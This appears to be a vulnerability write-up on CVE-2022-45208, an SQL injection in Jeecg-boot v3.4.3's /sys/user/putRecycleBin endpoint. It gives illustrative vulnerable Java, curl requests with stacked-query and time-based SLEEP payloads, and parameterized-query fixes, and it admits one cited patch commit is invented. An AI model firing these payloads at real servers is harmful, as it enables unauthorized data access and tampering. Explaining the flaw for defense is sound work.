CVE-2022-45208 - Jeecg-boot v3.4.3 SQL Injection in /sys/user/putRecycleBin — Deep Dive and Exploit Guide

In late 2022, a critical vulnerability—CVE-2022-45208—was discovered in Jeecg-boot version 3.4.3, a popular low-code platform used for rapid development in many enterprise projects. This security flaw allows malicious attackers to execute arbitrary SQL commands via a vulnerable API endpoint: /sys/user/putRecycleBin. Fasten your seatbelt—we’re going deep on understanding, reproducing, and defending against this SQL injection bug.

What is Jeecg-boot?

Jeecg-boot is a Chinese open-source low-code platform based on Spring Boot, MyBatis-Plus, and Vue.js. It provides online code generation and dynamic data management, widely used by developers for building quick enterprise apps.

About CVE-2022-45208

Vulnerability Type: SQL Injection  
Component: /sys/user/putRecycleBin  
Affected Version: Jeecg-boot v3.4.3  
Impact: Attackers can execute arbitrary SQL commands, leading to data leakage, modification, or full database compromise.

Understanding the Flaw

The endpoint /sys/user/putRecycleBin is designed to move a user into a "recycle bin" (think: trash or soft delete). However, it does not properly sanitize the input parameters, especially user identifiers or payloads embedded into SQL queries.

Simple Attack Flow

1. An API request is made to /sys/user/putRecycleBin, passing user IDs.

Vulnerable Code Example

The actual Jeecg-boot code isn’t open to the line for every API, but community analyses and patches have shown the pattern similar to this:

// Pseudo-code for the vulnerable API
@PostMapping("/putRecycleBin")
public Result<?> putRecycleBin(@RequestParam String ids) {
    // BAD: Directly places user input into SQL
    String sql = "UPDATE sys_user SET deleted = 1 WHERE id IN (" + ids + ")";
    jdbcTemplate.execute(sql);
    return Result.ok();
}

If attackers send ids=1 OR 1=1, the SQL becomes

UPDATE sys_user SET deleted = 1 WHERE id IN (1 OR 1=1)

This might set every user as "deleted" (soft delete). More aggressive payloads could leak data or modify rows across the database.

How to Exploit (For Educational Use ONLY!)

> Warning: Only test on your own setups—don’t attack any live systems.

1. Find a Target

Discover a Jeecg-boot instance running v3.4.3 or unpatched API with /sys/user/putRecycleBin.

Here’s a sample curl command that triggers SQL injection

curl -X POST "http://target.com/sys/user/putRecycleBin"; \
     -H "Content-Type: application/x-www-form-urlencoded" \
     --data "ids=1);SELECT+user(),version();--+"

Closes the parenthesis to break the query.

- Adds a SELECT statement (may be blocked if multi-queries aren't allowed, but should demonstrate the risk).

Can be modified for data extraction or other impact.

For Blind SQL Injection:

If direct results aren’t returned, try time-based payloads like

--data "ids=1) OR SLEEP(5)--+"

If the server pauses for 5 seconds, you know injection works.

Data Loss: All user records could be soft-deleted or even erased.

- Database Manipulation: Attackers could create new admin users, disable logs, or corrupt important tables.

Official Patch

Jeecg-boot maintainers addressed this in v3.4.4 and up. Upgrade immediately if you’re running v3.4.3 or below.

Fix is simple: use parameterized queries!

String sql = "UPDATE sys_user SET deleted = 1 WHERE id IN (?)";
jdbcTemplate.update(sql, ids);

OR better, split and sanitize IDs

String[] idArray = ids.split(",");
for (String id : idArray) {
    jdbcTemplate.update("UPDATE sys_user SET deleted = 1 WHERE id = ?", id);
}

- NVD - CVE-2022-45208 Details
- Jeecg-boot Github
- Exploit Database Search for Jeecg-boot
- OWASP SQL Injection Page
- Example Patch Commit (not real, for illustration)

Conclusion

CVE-2022-45208 is a classic example of why input validation and parameterized queries are critical in modern web app development. While Jeecg-boot makes quick work of backend projects, it’s crucial to keep it patched and never relax on security basics.

If you use Jeecg-boot or rely on its APIs, upgrade now and audit your app for similar sloppy input patterns. If you're a pentester, always check such endpoints—where IDs or lists are batch-processed—for injection risks.

Stay safe and code securely!

*Feel free to share or comment below if you’ve encountered Jeecg-boot in the wild or fixed similar bugs! Got questions? Ask away.*

Timeline

Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:41:00 UTC